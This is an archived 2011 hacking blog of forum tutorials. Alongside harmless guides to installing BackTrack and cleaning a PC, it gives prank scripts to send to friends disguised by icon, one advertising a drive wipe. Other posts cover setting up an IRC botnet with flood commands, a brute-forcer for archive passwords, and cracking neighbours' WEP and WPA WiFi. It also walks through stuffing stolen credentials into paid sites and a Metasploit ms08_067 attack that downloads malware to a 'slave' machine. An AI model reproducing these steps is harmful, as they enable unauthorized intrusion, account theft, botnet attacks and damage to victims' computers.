Wednesday 30 November 2011

[HOT ]Notepad Tricks...

1) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.
--------------------------------------------------------------------
2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.
---------------------------------------------------------------
3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.
------------------------------------------------------------
======================
¦S¦?¦g¦?¦?¦?¦ ¦ß¦ÿ¦ : ¦¦??r? ¦¦û???r ™

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.
----------------------------------------------------------
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.
---------------------------------------------------------------
======================
¦S¦?¦g¦?¦?¦?¦ ¦ß¦ÿ¦ : ¦¦??r? ¦¦û???r ™

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.
---------------------------------------------------------------
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.
-------------------------------------------------------------------
8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.
------------------------------------------------------
======================
¦S¦?¦g¦?¦?¦?¦ ¦ß¦ÿ¦ : ¦¦??r? ¦¦û???r ™

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.
-----------------------------------------------------------------
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.



@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
Read More

Tuesday 29 November 2011

== How To Install BackTrack OS ==


Step 1. Downloading Backtrack
Download this ISO . (This is the Backtrack Operative System)
Code:
http://www.backtrack-linux.org/download.php?fname=bt4f

Step 2. Recording the Backtrack OS Into a DVD .

The .iso you downloaded, is the Backtrack Operative System. You have to record it into a DVD.

To do so;
Download .iso Burner:
Code:
http://software.lsoft.net/IsoBurner-Setup.exe

Install .iso Burner, and Open it.

Now, click (...)
Select the .iso File
Insert the DVD and Press BURN .

Step 3. BIOS Config and DVD Boot

[Now, we want our PC to start from the Backtrack DVD (The one we recorded in Step 2) We need to set up our BIOS to start from CD and NOT from Hard Drive.]

To set your BIOS to start from cd/dvd:

Reboot your PC, at very first, (When the brand of your motherboard appears) Press F2 (It can be different , but its mostly F2) .

Search for Boot somewhere in your BIOS Settings.
[Image: boot-pri_thumb.jpg]

CD-DVD ROM, should be your 1st Boot Device.

Save your new settings, and close your BIOS.

Step 4. Booting Backtrack

Open your CD/DVD Tray and insert the DVD where you recorded the BackTrack.iso .

Backtrack should start booting.
[Image: backtrack4-boot.jpg]

Step 5. Partitioning the Hard Drive 1

With Backtrack Running,
Press the Home Button > Backtrack > Misc > QTParted
[Image: romper31tx.jpg]

Step 6. Partitioning the Hard Drive 2

QTParted should be open.

On Disks,
Right click on your Hard Drive and press "Make a new Partition Table"
[Image: tut2f.jpg]

A new dialog will appear, just click Yes .
[Image: romper103vu.jpg]

Right click your CURRENT Hard Drive and press Create.
[Image: romper11111110lx.jpg]

A new window should open. Settings should be:
Create as: Primary Partition
Partition Type: ext2
Size: Whatever you feel like. (I suggest at least 4GB)

[Image: romper114wl.jpg]

Then, press OK.

This should be enough to install Backtrack.

Step 7. Installing Backtrack 1

Next to the Home icon, we have a Shell, or Terminal Icon; Press it.

With "Shell" open, type this:
Code:
ls /mnt
------------ [floppy drives, hd, cd etc. should appear there...]
mkdir /mnt/hda1
mount /dev/hda1 /mnt/hda1
exit

[Image: romper157bp.jpg]

Step 8. Installing Backtrack 2

Click "Home" > System > Backtrack Installer
[Image: romper187zw.jpg]

A new windows should be open.

Settings should be:

Source; /boot
Install BackTrack; /mnt/hda1
Write MBR to; /dev/hda
[Image: romper61kr.jpg]

And press Install .

That should be everything :) .

Sorry for my spelling, my main lang is spanish.
This is my first tutorial , I hope its useful .
Read More

Monday 28 November 2011

Mange IRC Bot [TUT]

Oh, I cannot vouch if the builder is backdoored or not, but the source is there aswell, so go ahead. (I recommend running it in SandBoxie though).

When you have opened the builder, you will see in the left corner of the application (File - Options - Setting's)
Left click File, and you will see this:
[Image: aA6qS.png]

It asks you to put in DNS/IP, so put in your IRC Server IP or DNS.
So just put whatever you manage to connect to your IRC server with.

As for the nickname this is CASE-SENSITIVE so the nick you put there must be used at all times.
So lets say you choose the nick Hackforums you have to use Hackforums at all times in order to operate the bot installed on your victims computers. You need every letter right.

Now onto the next step, we are gonna change the settings for the bot:

[Image: iifre.png]

Mutex: This will automatically change itself when you build it, leave it as it is.

Port: The port you connect to your IRC Server on. 6667 is the most common one so I am using it. I am pretty sure you could use SSL aswell, so try put your SSL port in there if you feel like.

Prefix: Prefix that triggers the command for your bots.
Lets say I were to SSYN Flood, and the prefix I have put in the picture is an AT-sign "@", I must use @ssyn (IP) (port) (time in seconds)
You can change this prefix by adding whatever you like, but @ and ! would be the easiest ones to avoid confusion.

Install name: Self explanatory.

Channel: The channel your bots connect to.
E.g #Lobby, then it will join #Lobby. If it is a key required to enter the channel put it in the next box. E.g 123.

Antis: Just anti-Sandboxie etc, meaning if someone is to try run the file in Sandboxie it won't.

Excuse me if you do not understand my English, as it is not my primary language.

Thanks, no hating plox, only for those people that are looking for an easy and free IRC Bot.




download from here
Read More

Thursday 24 November 2011

Hey guys just made this small program yesterday so thought of sharing.
Its not actually a bruetforcer right now it only tests for the passwords from a text file in the format:
pass1
pass2
.
.
.
Now , run this file; mention the required paths and test it.
I have tested it on Windows 7 [32 bit].
Please test on others as well!
Download link: here
Virus Scan: here
Note: I dont know why but its showing 2 false positives, I have not even started with socket programming that I can make backdoors!
Here is the source , I am sorry for not including it earlier:

Quote:int main()
{
char tr[100];
char pass[300];
char archive_path[300],save_path[100],txt_path[300];
cout<<"Enter the path of the archive(max 300)\n";
cin>>archive_path;
cout<<"\nEnter the path where you want to save the files after extraction(with the trailing \\ for a folder) (max 300) \n";
cin>>save_path;
cout<<"\nEnter the path of the text file to check the passwords(max 300)\n";
cin>>txt_path;
char root_dir[300]="\0";
strcat(root_dir,getenv("SystemDrive"));
strcat(root_dir,"\\Program Files\\winRAR\\");
ifstream fin(txt_path);
int res=1;
while(fin)
{
fin.getline(tr,sizeof(tr),'\n');
_chdir(root_dir);
strcpy(pass,"winrar.exe -p");
strcat(pass,tr);
strcat(pass," -ibck -o+ -inul x ");
strcat(pass,archive_path);
strcat(pass," ");
strcat(pass,save_path);
res=system(pass);
if(res==0)
break;
}
if(res==0)
{
char found[200];
strcpy(found,"The password is: ");
strcat(found,tr);
MessageBoxA(NULL,found,"Found!!!",MB_OK);

}
if(res!=0)
MessageBoxA(NULL,"Sorry the password couldn't be found","Not Found Buddy!",MB_OK);
fin.close();

return 0;
}
.
Usage:
.

[Image: 1dbc954387ace82107d4cfa40e525c54.png]

Please have a look and your feedback will always be appreciated!

Read More

Wednesday 23 November 2011

Step 1: Open up a terminal.

Really this is going to be your base of operations.


Step 2: Open up GParted.


In your terminal, type in "sudo gparted &" (no quotes)


Step 3: Create 3 primary partitions: EXT2 formatted at left of drive (1 GB in size), a 200 MB UNFORMATTED partition in slot 2, and an UNFORMATTED partition in slot 3 (any size you want, just leave some [min 10 GB] space for linux).


Right click unformatted space, I think the rest is self explanitory.


Step 4: Create an extended partition to take up the remaining space.


Same procedure as above, but select extended as opposed to primary.


Step 5: Inside the extended partition, create 2 logical partitions: a 4 GB linux-swap formatted partition at right, and the rest an EXT4 formatted partition (label it LINUX or something like that)


Similar procedure as above.


Step 6: Apply the changes.


Click the checkmark. This may take a while.


Step 7: Turn swap on.


In the list of partitions, right click the swap space and click swap on (or whatever it says).


Step 8: Install virtualbox and virtualbox-fuse


In the terminal, type in "sudo apt-get update && sudo apt-get install virtualbox virtualbox-fuse".


Step 9: Make a new virtual machine


When it asks to make a virtual hard drive, select dynamic VDI, in the size menu click the folder icon next to name and select LINUX on the left and create it in there.


Step 10: Attach your ISO file for windows 7 to the virtual machine


In the main interface, hit settings, then storage, click the thing attached to the IDE drive, and select your ISO.


Step 11: Start the virtual machine and install windows 7 inside of it.


Wait for it to stop rebooting before you power off the machine.


Step 12: Mount virtual machine's VDI file to /mnt


run "sudo vdfuse -p -f [VDIFILE] /mnt"


Step 13: Copy Partition1 to the smaller of the two UNFORMATTED partitions.


run "sudo dd if=/mnt/Partition1 of=/dev/sda2" (assuming /dev/sda2 is the small one).


Step 14: Copy Partition2 to the larger of the two UNFORMATTED partitions.


run "sudo dd if=/mnt/Partition2 of=/dev/sda3" (assuming /dev/sda3 is the big one [thats NOT what she said]). THIS WILL TAKE A WHILE.


Step 15: Resize the NTFS filesystems.


run "sudo ntfsresize --force /dev/sda2 && sudo ntfsresize --force /dev/sda3" (replace /dev/sda2 & /dev/sda3 if they're different)


Step 16: Install ubuntu


When it asks you for formatting, do manual. The ext2 partition at the front, use it as an EXT2 filesystem as "/boot". The ext4 partition in the extended partition, use as EXT4 as "/".


Step 17: Reboot :D
Read More

INTRODUCTION :
Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .

Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked
easily .
It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .
The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .

You will be using two tools .
1.Commview for WiFi :
You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .
The more packets you capture the better chances of cracking the password .
You will need more than 1,00,000 minium packets to crack the password .
The packets will be captured in the .ncp format .
You will use this tool to convert the .ncp to .cap .

NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .

2.Aircrack-Ng GUI :
You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

NOTE : You need to run this as administrator .

I have provided links for both the software below .

Download Links :

These are the links to the official website of the tools .
Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

1.Aircrack-NG GUI

Get it from here : http://www.aircrack-ng.org/

2.Commview for Wifi

Get it from here : http://www.tamos.com/download/main/ca.php

GET READY TO CRACK :


STEP 1 :
1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
It automatically installs the necessary drivers . Allow it to install .

NOTE : You will not be able to connect to any Network using WiFi when using CommView .

STEP 2 :
2.Click on the PLAY ICON in the Left First .

[Image: 1hjh.png]

STEP 3 (Choosing the Network (a) ) :
A new window should pop up now .
Click on the START SCANNING button .
[Image: 2tit.png]

STEP 4 (Choosing the Network (b) ) :
Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
NOTE : This tutorial is only for WEP protected networks .

[Image: 3.png]

STEP 5 (Capturing the Packets) :
The windows should close now and you should see that CommView has started Capturing Packets .

[Image: 4.png]

STEP 6 (Saving the Packets ) :
Now that the Packets are getting captured you need to Save them.
Click on Settings->Options->Memory Usage
Change Maximum Packets in buffer to 20000
[Image: 9gyg.png]

Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 2000
Average Log File Size : 20

[Image: 7.png]
Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

STEP 7 ( Concatenating the Logs ) :
Since you are capturing a lot of logs you will need to concatenate them into once file .
To do this go to Logging and click on CONCATENATE LOGS
Choose all the files that have been saved in your specified folder and Concatenate them .

Now you will have one .ncf file .

STEP 8 (Converting .ncf to .cap ) :
Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file
Now File->Export->Wireshark/TCP dump format .

--


Aircrack Part :


Now for the Second Part Cracking this is very simple .

Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe

Choose the .cap file and you should be able to do the others .

If you have any questions or having problems post a thread il reply .

This is a simple tutorial . There is more advance using the rules and stuff but I havnt used it yet . This worked for me . Hope you found it useful .

Took a lot of time . Please leave your feedback.

Happy Hacking
Read More

Tuesday 22 November 2011

[TUT]Ultimate cracking guide, MUST read!



1) The first thing you need to do is find some good working proxies. To do that we first need Proxyfinder Enterprise.

Picture

Press find, it will take about 20 seconds to have a good list of proxies. After that press save and save the list were you want.

2) Now we have a huge proxy list we need to check which proxies are anonymous and which are transparent.

[Image: 2czyej7.jpg]

Press "load" to load up the proxies(The list you saved just a second ago).
When the list is all loaded up press start and just let the program run.
When it's ready press "Save" and save to list were ever you want.

3) Now we need to check it with a better program (The reason to do this is because Proxy Checker does show some proxies that are transparent as anonymous. And Charon is a very slow program. So to check it as fast and good as possible this is the best method!

[Image: 2q08wth.jpg]

Start up Charon and press "Connect Options" on the left. Make sure your settings are the same as shown in the picture above.

[Image: 2vjsnc7.jpg]

Then press "Judge Options" under "Connect Options". Press "Test judges" and wait till it's finished. We then need to select 1 or 2 of the best judges. The lower the ping the better. Select the best judge(s). Right click and press "Move judge to selected list". Then remove the old default judge. Just by clicking on it and then press the delete button.
Now we are all set to go check the proxies. Go back to the main page of Charon and press on the left side "Check proxies" and then select the option: "Check anonymity of all proxies". You now need to wait a long time for Charon to check all the proxies. When Charon is finished checking the proxies press cntr+a to select all the proxies and then press the right mouse button and press "Delete" and then "Delete all apart from good, anonymous proxies (and working socks)". The last step is to save the list by just clicking the disk icon left under quick options and save it where ever you like.

4) We now need a good word list.

Picture

We use a program called Athena II. It is a very simple program. The only thing you need to do is press "start" and at least let in run for 20 minutes or so (the longer you run it the more combo's you get so i advice to let it run a bit longer). It doesn't stop automatically so you need to stop it yourself.
When you stop it you see a few files in the folder you put Athena II in.
Combos.txt = A file with all the combos (Username:password combinations).
Logfile.txt = Useless
Logins.txt = All the combos (in this form http://username:password@sitename.com)
You can use the combos.txt as your combo list but if you want to have the combos for just a specific site you could take them from the Logins.txt. We need to use another program for that.

5) We need to use Raptor 3 to get the combos from the Logins.txt for a specific site or to split the list into a password list and a username list.

[Image: 2ljl4jb.jpg]

Open Raptor 3 and click open the combo list on the top left side. Go to filters and click on "Custom filters". Right click in the window and select "Add". If you only want for example bangbros make sure the options are as in the picture.

[Image: 105y593.jpg]

Filter name = Just the name, doesn't really mater just to make it easy to see which filter it is.
Action = What to do with the text that has the word in it.
Filter Subject = Were is the word that you want to do something with. In the password in the username etc.
Condition = Does it has the word or is it the word.
What = The word that you are looking for.
Ignore case = speaks for itself.

After this press "Filter". Now save this file where ever you want to. Go to "Generators" and press "Pass leecher". Right click in the window and press "Add file". Open the file you just saved and press "Leech". Congratulations you now have a combo list for only the site you wanted! Now go back to tools and press "Remove Duplicates" and rite after that again "Remove Duplicates". If you want to separate the usernames and password you can press "List tools". It is in the toolbar above. And press "Make Single List" and then press "Make two lists". Now just save the username list and the password list.

6) Now we just need to start cracking!

There are a lot of programs that you can use to crack for example: C-force, Access Diver, Apex, Sentry etc.
In this tutorial i will only show Acces Diver. (For this bit i use a few pictures i found on the net , hope you guys don't mind;))

[Image: 3450c92.jpg]

Open up Acces Diver and put my skill level to Expert.

[Image: fnthcp.jpg]

Press on the button that says "Settings" and put your settings the same as in the picture above.

[Image: ve0l0p.jpg]

Now press the button that says "Proxy" and load up your proxy list by pressing the icon were the arrow is pointing at. You don't need to press the Speed/Accuracy test button because the tester in Access Diver is crap.

[Image: 28cm2xg.jpg]

Now click on the button that says "Dictionary" then Press "Load a combo file" or you can put in your username and password list by pressing the icons under "username list" and "password list"
Now we need the url from the site you are trying to crack.
Code:
http://members.bangbrosnetwork.com/
http://www.ftvmembers.com/mt2941ct/updates.html
http://members2.wifeysworld.com/
http://members.allnetworkpass.com/
http://www.ftvmembers.com/mt2941ct/updates.html
http://www.bangland.com/members/
http://www.bustydreams.com/members/
http://www.cheerleaderchicks.com/members/
http://members.onlytease.com/members/
http://members.celebtaboo.com/member....phtml?pni=601
http://www.shanesworld.com/members/
http://karisweets.com/members/index.php
http://totalaccess.hotbitchhigh.com/premium/
http://members.melissamidwest.com/
This is just a small lists of sites. Google around a bit and you will find what you are looking for.

[Image: ot3ne0.jpg]

Now insert the url of the site you want to crack. You can see in the picture were. The only thing you now have to do is press "Test Basic-authentication" and wait for a while.

Picture

When you have cracked a few accounts you can press the tap that's says "History" to see the accounts you have cracked. Congratulations you can now crack porn! and other sites!


Thanks a lot for reading this tutorial! I put a lot of time and effort in this tutorial. So i hope i get some positive reactions.

Read More

Monday 21 November 2011

A lot of the time I see this question asked here & everywhere on the forums that:
"Is it possible to infect slave using his IP address?"

So, I am going to show you how to do it.


Requirements:


Nmap

Metasploit

First of all you need the target IP of your slave.

Then open Metasploit Console & type db_create.

[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.

[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>

[This will scan OS, Ports, and Services running on the slave's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.


Now it's time to exploit the slave's machine.

Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:


Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Usage: This will show all targets by exploit]

Now Type set target 0

[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options

[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to

Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >

[Usage: This will set RHOST (slave's ip) to xxx.xxx.xxx.xxx]

Next Type set URL
http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit

[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)

So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.


In most cases you get a shell.
Read More

Sunday 20 November 2011

Speed up connection without software

* Right click on My Computer

* Select Properties

*-Device manager * Then the HARDWARE tab-> Device manager

* Select Ports -> Communication Port (double click on it and Open)

* Then

* To Port Settings and make some changes:

* In the "Bits per second" change it to 128 000

* And "Flow control" option instead of the Hardware

*Apply and see the results.
Read More

Saturday 19 November 2011

First you must learn to differentiate between an infection and just general computer slowness.

Symptoms of Infection
There are a number of symptoms which indicate that your computer has been infected. If you notice "strange things" happening to your computer, namely:
  • unexpected messages or images are suddenly displayed
  • unusual sounds or music played at random
  • your CD-ROM drive mysteriously opens and closes
  • programs suddenly start on your computer
  • you receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this, then it is very likely that your computer has been infected by a virus.

Additionally, there are some typical symptoms which indicate that your computer has been infected via email:
  • your friends mention that they have received messages from your address which you know you did not send
  • your mailbox contains a lot of messages without a sender's e-mail address or message header.

These problems, however, may not be caused by viruses. For example, infected messages that are supposedly coming from your address can actually be sent from a different computer.

There is a range of secondary symptoms which indicate that your computer may be infected:
  • your computer freezes frequently or encounters errors
  • your computer slows down when programs are started
  • the operating system is unable to load
  • files and folders have been deleted or their content has changed
  • your hard drive is accessed too often (the light on your main unit flashes rapidly)
  • Microsoft Internet Explorer freezes or functions erratically e.g. you cannot close the application window
Reference: http://www.viruslist.com/en/viruses/ency...=153280800

NOTE: Paranoia is not a symptom of infection!



What to do if your Computer is Running Slow

Content taken and edited from malwareremoval.com

Computers need regular maintenance, I know this comes as a shock to some of you, but it's true nonetheless.

It's best if we break things down into two sections, the first are those that should be done regularly, the next are those that only need to be done once, or very infrequently.

1. Tasks that need to be carried out regularly.
  • Clean out Temp files
During the normal operation of your computer, Windows and your other programmes create an awful lot of temporary files. For the most part they are just that, temporary. But for any number of reasons, when they're no longer needed they don't get removed by the programme that created them. So over time their number builds up, and unless you clear them out they can slow down your computer noticeably.

In the case of your Browser, the problem can be worse. All browsers cache the web pages you visit. The original reason was to make loading pages faster. When everyone was on dial-up this was quite a good idea, but with modern fast connections it's mostly unecessary now. However browsers still cache webpages, and unless cleaned out regularly they build up to a position where they can have some pretty dramatic effects on how your browser works. Any number of wierd browser problems are caused by nothing more than an overfull cache.

So once a month, or once a week if you're a heavy user, it's a good idea to clean out your Temporary files.

To clean out temp files:

A good program to run regularly is CCleaner.
  • Download CCleaner from here
  • Double click on ccsetupXXX_slim.exe to start the installation of CCleaner. (XXX is the version number)
  • Click OK
  • Click Next
  • Click I agree
  • Click Next
  • Click Install
  • Once the installation has finished, click Finish

Open CCleaner if it's not already running.
  • Select Cleaner Settings.
    Check Internet Explorer, Windows Explorer, and System so that all items are checked. Then under Internet Explorer, Uncheck "History". In the Advanced section, have a check only on Old PreFetch Data.
  • Click on the Options block on the left. Select Advanced.
    Check Only delete files in Windows Temp folders older than 48 hours.
  • Set CCleaner to Run When Computer Starts. Click on the Options block on the left, then choose Settings. Check Run CCleaner when computer starts.


  • Defrag your Hard Drive

Every time you write a file to your Hard Drive, the drive controller has to find space on your drive. It will often break files into fragments, so that it can use the available disk space efficiently. However over time files can become very fragmented because of this, and your drive controller has to work harder to find all the fragments and re-combine them so that a programme can use it. This slows things down, depending on the amount of fragmentation of your files, it can slow things down a lot.

So once a month (for heavy users), or once every 3 or 4 months (for light users), it's a good idea to defragment your hard drive.

This will re-arrange the fragments on your drive so they form contiguous entities which are much easier for your drive controller to deal with.

It's a time consuming operation, usually taking several hours, so best to do what I do, and start it going before you go to bed.


To defrag your hard drive:
  • Click Start
  • Run
  • Type: Dfrg.msc and click ok.
  • Select your main Drive or "Volume" (usually C)
  • Click Defragment
This may take a while so as said previously, best to leave running over night. Once it has completed, repeat the procedure on any other drives you have on-board.


2. Tasks that don't need to be carried out so often.
  • Reduce the number of Start Up programs.

Pretty much every programme you install these days is set to auto start when you boot up. The programme manufacturers tell you it's for your benefit, but the truth is for most of them it's just not necessary that they do so. Lots of auto starting programmes will severely slow down your startup time, and having lots of unecessary programmes running in memory will slow down the running speed of your computer as well.

Luckily it's not hard to prevent unecessary programmes from auto starting. Doing so does not mean you can't use the programmes, you start them by double clicking on their icons, just as you always have, it just means they won't be running when you're not using them.

Of course programmes like your Firewall and Anti-Virus need to auto run, so we won't be touching them at all.

To remove programs from startup:
  • Download StartupLite by Rubberducky to your Desktop.
  • Doubleclick StartupLite.exe to launch the programme.
  • Ensure the Disable box is checked.
  • Click Continue.
  • A pop up message will tell you the unecessary startup items in your list have been disabled and ask you to restart your computer.
  • Re-start your computer.

  • Check the amount of free space you have on your Hard Drive.

Windows (XP and Vista) needs a certain amount of "overhead" (free disk space) if it's to operate efficiently. If it doesn't have that space, your processor has to "page out", which will slow everything down considerably.

Ideally you need at least 15-20% of your disk to be empty, if you don't have 15% then it's time to start freeing up some disk space.

To check your free disk space:

For users of XP
  • Click Start > All Programs > Accessories > System Tools > Disk Defragmenter
  • Look in the last column (top right) under % Free Space
  • Exit Disk Defragmenter


For users of Vista
  • Click Start > Computer
  • A window will open
  • Information for your Hard disk drive(s), including the exact amount of free space available, will be displayed in the uppermost portion of the window.


Presuming you don't have enough free disk space, here's a couple of suggestions for freeing some up

  • Remove unecessary programmes.
OK, time to be honest with youself, are you really using all those programmes you've got installed, or are there some that you haven't used in a lifetime. If there are, then why not get rid of them and free up some disk space. Your hard drive will thank you for your efforts.

To remove unwanted/unused programs:


For users of XP
  • Click Start > Control Panel > Add or Remove Programs
  • Click on the programme you want to remove to highlight it.
  • Click the Change/Remove button and follow any instructions given.
  • Repeat for all programmes you wish to remove.



For users of Vista
  • For Control Panel Home view - Click Start > Control Panel > Programs > Programs and Features
  • For Classic View - Click Start > Control Panel > Programs and Features
  • For either option, to uninstall a program, select it from the list and then click Uninstall.

  • Reduce your System Restore Points.

Windows creates System Restore points on a regular basis (every 24 hours), they take up a great deal of space on your hard drive (upto 12% for XP, 15% for Vista). If your computer has been running without problems (other than the slowness) for some time, then you can free up a lot of space by reducing the number of System Restore points to one (the latest).

Windows will continue creating more RPs, but it'll take some time before you need to thin them out again.

To reduce the number of System Restore points:


For users of XP
  • Click Start > All Programs > Accessories > System Tools > Disk Cleanup
  • This will bring up the Disk Cleanup window.
  • Click the More Options tab.
    • In the System Restore field, click Clean up
    • You will be prompted if you want to remove all but the most recent Restore Point.
    • Click Yes.
  • Click OK.
  • When prompted whether you're sure you want to do this click Yes.




For users of Vista
  • Click Start > All Programs > System Tools > Disk Cleanup
  • Select Files from all users on this computer
  • Click on Continue
  • Select the appropriate drive letter (usually C:)
  • When the Disk Cleanup window opens, select the More Options tab
  • Under System Restore and Shadow Copies click on the Clean up button
  • All but the latest restore point will be removed
    • Note: In some editions of Windows Vista, the disc might include file shadow copies and older Windows Complete PC Backup images as part of restore points. This information will also be deleted.


What to do if your Computer is Infected

Start by searching the Self Help guides HERE. Use the CTRL + F feature and type in the name of the Rogue Anti-virus or symptom of infection and see if anything comes back.


If nothing comes back, seek free, professional help from our trained helper's. To get help start by reading "I am Infected! What do I do?"
Read More
[Image: 8Ifdn.jpg]

[Image: ePfVI.jpg]
    Hello and welcome to my tutorial about wireless networking. Today I'll be teaching you how easy it is to obtain access to a wireless protected network. There are lots of questions coming from the beginners on how to crack WEP/WPA/WPA2 keys and accessing their neighbor's connection. The purpose of this tutorial is to answer them. Judging from the "tutorials" on youtube which are either obsolete, or simply misguiding the listeners, this tutorial will be different. I will be covering all of the aspects and ways of hacking a network and gaining access to the router. This tutorial will be divided in 2 parts, such as WEP and WPA/WPA2 hacking. Please read below on what you need to succeed.

[Image: FjkSQ.jpg]
    • Backtrack 5 - I would suggest GNOME, 32Bit, ISO & Direct
    • Compatible Wireless Card
    • WPA Word List - Search via torrents to find one

[Image: V5vKq.jpg]
  • Making a bootable USB
